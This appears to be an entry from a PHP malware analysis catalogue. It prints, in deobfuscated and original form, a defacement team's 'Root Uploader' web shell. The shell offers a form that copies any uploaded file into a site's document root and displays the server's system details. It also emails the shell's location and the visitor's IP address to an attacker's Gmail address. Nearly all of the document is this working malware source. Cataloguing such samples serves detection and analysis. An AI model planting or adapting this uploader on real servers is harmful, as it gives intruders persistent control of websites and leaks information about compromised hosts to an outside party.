PHP Malware Analysis

Back to list

Tags

Emails
tangsel1928@gmail.com
Title
Home - Root Uplpader
Input
_POST
Environment
set_time_limit
php_uname

Deobfuscated code

//Powered By Mr.Colded X Mr.Cold//
//Team : 3RROR YOUR SYSTEM //
<title>Home - Root Uplpader </title><center>
<body bgcolor="black">
    <br><br><br><br>
    <br>
    <font color="red" size="5">> TegalXploiter <</font>
<font color="green"></center><br><br>
    <center>
<?php 
$uploaddir = 'C:/xampp/htdocs/kampungkb/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
echo "home uploader<br>";
echo "<b>" . php_uname() . "</b><br>";
echo "<form method='post' enctype='multipart/form-data'>\n      <input type='file' name='idx_file'>\n      <input type='submit' name='upload' value='Upload'>\n      </form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root . '/' . $files;
if (isset($_POST['upload'])) {
    if (is_writable($root)) {
        if (@copy($_FILES['idx_file']['tmp_name'], $dest)) {
            $web = "http://" . $_SERVER['HTTP_HOST'] . "/";
            echo "Sukses Cok! -> <a href='{$web}/{$files}' target='_blank'><b><u>{$web}/{$files}</u></b></a>";
        } else {
            echo "Gagal Upload Di Document Root.";
        }
    } else {
        if (@copy($_FILES['idx_file']['tmp_name'], $files)) {
            echo "Sukses Upload <b>{$files}</b> Di Folder Ini";
        } else {
            echo "Gagal uplod";
        }
    }
}
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = 'tangsel1928@gmail.com, tangsel1928@gmail.com';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix {$x_path} :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");


Original code

//Powered By Mr.Colded X Mr.Cold//
//Team : 3RROR YOUR SYSTEM //
<title>Home - Root Uplpader </title><center>
<body bgcolor="black">
    <br><br><br><br>
    <br>
    <font color="red" size="5">> TegalXploiter <</font>
<font color="green"></center><br><br>
    <center>
<?php
$uploaddir = 'C:/xampp/htdocs/kampungkb/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
echo "home uploader<br>";
echo "<b>".php_uname()."</b><br>";
echo "<form method='post' enctype='multipart/form-data'>
      <input type='file' name='idx_file'>
      <input type='submit' name='upload' value='Upload'>
      </form>";
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
if(isset($_POST['upload'])) {
    if(is_writable($root)) {
        if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
            $web = "http://".$_SERVER['HTTP_HOST']."/";
            echo "Sukses Cok! -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
        } else {
            echo "Gagal Upload Di Document Root.";
        }
    } else {
        if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
            echo "Sukses Upload <b>$files</b> Di Folder Ini";
        } else {
            echo "Gagal uplod";
        }
    }
}
?>
<?php
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
$tujuanmail = 'tangsel1928@gmail.com, tangsel1928@gmail.com';
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
?>